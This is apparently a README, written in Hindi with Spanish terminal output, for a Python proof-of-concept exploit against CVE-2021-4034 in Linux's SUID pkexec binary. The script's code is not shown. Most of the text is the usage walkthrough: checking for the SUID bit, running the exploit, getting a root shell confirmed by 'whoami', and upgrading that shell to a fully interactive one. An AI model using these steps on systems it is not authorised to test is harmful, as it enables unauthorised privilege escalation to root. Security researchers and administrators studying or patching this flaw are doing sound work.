
CVE-2021-4034 के लिए Python प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो क्रेडेंशियल के बिना विशेषाधिकार बढ़ाने और इंटरैक्टिव रूट शेल उत्पन्न करने के लिए SUID pkexec बाइनरी का दुरुपयोग करता है।
CVE-2021-4034 (pkexec) यह पायथन स्क्रिप्ट pkexec फ़ाइल में कमजोरी का फायदा उठाकर बिना क्रेडेंशियल प्रदान किए रूट एक्सेस प्राप्त करती है।
· जाँचता है कि बाइनरी में SUID विशेषाधिकार हैं या नहीं, इस मामले में यह संवेदनशील है
usuario@gatogamer $ ls -la /usr/bin/pkexec
.rwsr-xr-x 1 root root /usr/bin/pkexec
usuario@gatogamer $
· रूट एक्सेस प्राप्त करने के लिए एक्सप्लॉइट चलाता है, इस मामले में इसे python3 के साथ निष्पादित करना ही आवश्यक है, समाप्त होने पर आपके पास रूट के रूप में एक कंसोल होगा
usuario@gatogamer $ python3 CVE-2021-4034.py
[+] Iniciando el exploit
[+] Exploit Completado
# whoami
root
#
· पूरक के रूप में, आप TERM का मान बदल सकते हैं, इसे 'xterm' या 'xterm-256color' पर सेट कर बेहतर दिखावट प्राप्त कर सकते हैं, इसके अलावा एक भिन्न शेल चला सकते हैं जैसे 'bash' या 'zsh', अब हमारे पास पूरी तरह से इंटरैक्टिव कंसोल है
# export TERM=xterm-256color
# zsh
root@gatogamer $